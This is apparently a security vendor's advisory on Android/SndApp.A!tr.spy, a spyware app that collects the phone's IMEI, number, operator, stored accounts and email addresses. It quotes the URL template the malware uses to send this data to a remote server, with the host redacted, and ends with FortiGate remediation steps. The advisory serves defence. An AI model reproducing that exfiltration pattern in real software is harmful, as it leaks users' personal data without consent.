Android/SndApp.A!tr.spy targets Android mobile phones. It sends to a
remote web server several personal information including the email addresses
of the victim.
The application displays a splash screen such as Figure 1.
Figure 1. Splash screen for Android/SndApp.A!tr.spy
If you press the icon on the top right corner, a list of affiliate apps are shown (see Figure 2). Those applications come from the same developer and show the same information-leaking behaviour.
Figure 2. Affiliate applications
Those applications have been removed from the Android Market.
When the malware is launched, it collects:
- phone's IMEI
- phone number
- network country iso (e.g "fr")
- operator's name
- accounts memorized on the mobile phone. This corresponds to all web accounts an end-user has his/her phone memorize so that he/she does not need to enter his/her credentials at each login. For instance, this can be Google accounts, Facebook accounts, e-Commerce accounts etc.
- emails: emails of the victim. Actually, those emails are collected from the login names specified in the accounts above. When a login name looks like an e-mail (e.g it has an @ inside), the malware assumes it is an email, and collects it.
http://[REMOVED].com/android-notifier/notifier.php? appId=1&deviceId=IMEI&mobile=PHONENUMBER&country=ISOCOUNTRY &carrier=OPERATORNAME&email=EMAILSWhen pressing the icon for affiliate applications, the malware issues several requests to:
http://[REMOVED]ck66.com/mt/w264y234e4z2y2/&subid1=inappwhich redirect to the related applications.
- FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.